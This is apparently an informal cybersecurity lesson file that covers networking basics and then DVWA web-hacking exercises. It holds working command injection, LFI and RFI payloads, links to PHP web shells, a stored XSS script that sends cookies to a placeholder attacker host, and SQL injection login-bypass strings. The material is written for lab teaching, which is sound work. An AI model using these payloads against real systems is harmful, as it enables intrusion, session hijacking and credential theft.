Files
OpenCybersecLessonPlan/02 - Intro to Networking and Web.txt
T
2024-06-28 18:50:56 -06:00

129 lines
4.4 KiB
Plaintext

== Networking ==
IPv4/IPv6
ipv4 127.0.0.1
ipv6 2001:db8:3c4d:15::1a2f:1a2b.
DNS
translates domain names into ip addressess
client server
CLIENT = YOU(r device)
web server in this case
client: "hey google give me x page" -> upload
google: "here I found it, go ahead and download this page" <- download
request -> reply
TCP/UDP
web pages
files. .html .php .aspx
request: /dogs.html -> server: here is dogs.html
request/reply/"everything is a file"
frontend/backend
get/post/etc
"hey google, search for ppony fanfics"
request: POST search=pony fanfics
frontend: is the stuff sent to your Browser
and the web pages you make requests to
(public, client-facing)
html/css/javascript
backend: web servers,
php, node,
database, actions, api
== Basic Web Hacking ==
DVWA
Web Browser:
* command injection
get the GET var (ip)
load that into a command (ping command)
execute
theory: execute("ping $ip");
$ip = 8.8.8.8
Theory execute("ping 8.8.8.8")
$ip = 8.8.8.8; ls
$ip = 8.8.8.8 && ls -lah && whoami && groups && id
$ip = 8.8.8.8 && echo "hello world" > file.txt
a few things to try:
; (stack commands)
&& (stacks commands)
` (executes commands on some systems)
echo "something" > file.php (make a file)
* LFI
Local File Inclusion
"web server loads a file from its own drive and shows it"
try making it read a sensitive file?
a few things to try:
/etc/shadow
/etc/passwd
../../../../../../../../etc/passwd
Leak sensitive files
Database files
* RFI upload
When web server downlaods and executes a remote file
like: /page.php?file=file1.php -> /page.php?file=https://pastebin.com/raw/jmtqDfWQ
(if you need multiple GET variables):
./page.php?file=https://pastebin.com/raw/jmtqDfWQ&somevar=1337
(append &variablename=value)
a few things to try:
PHP shell
p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
Malware of any type
* Stored XSS
<script>
i=new Image();
i.src="http://evilsite.com/cookielogger.php?cookie="+document.cookie;
document.appendChild(i);
</script>
* Reflected XSS
like search pages, etc
uses GET variables in the URL usually
requires tricking a victem into clicking a malicious link
* Open HTTP Redirect
get variables usually
just let you redirect from a legitimate site to your own
usually requires getting a victim to click a malicious link
SQL Injection:
"modifying an SQL query to do something fun"
Lab: https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/17
Theory: SELEC
$user = Delilah123
$password = ??
SELECT * FROM users WHERE username='$user' AND password='$password';
$password = '
SELECT * FROM users WHERE username='Delilah123' AND password=''';
ERROR!
$password = anythinghere' OR 1=1
SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1'
ERROR
> always true!
$password = anythinghere' OR 1=1 --
-- is an sql comment! (space at start and end)
SELECT * FROM users WHERE username='Delilah123' AND password='anythinghere' OR 1=1 -- '
EXECUTES AND MATCHES!
#Burp Suite:
#* Weak session IDs
#* Brute force
#Coding:
#* CSRF
#* XSS keylogger
#* Advanced XSS+CSRF payload
Links:
SQL Injection Lab (WIP): https://www.db-fiddle.com/f/mZ2ftcLLzZLbrEELn38hjQ/16
p0wny-shell-FI-mod: https://pastebin.com/raw/jmtqDfWQ ( Source: https://github.com/flozz/p0wny-shell )
simple-php-shell: https://pastebin.com/raw/uxbKCBGg
basic XSS cookie stealer: https://pastebin.com/raw/puftrh39
General payloads including XSS and SQL Injection: https://swisskyrepo.github.io/PayloadsAllTheThings/
General hacking: https://cheatsheet.haax.fr/
Pi Pico W Power Analysis Tool (WIP): https://github.com/PrincessPi3/PiPicoPATLFGGGGG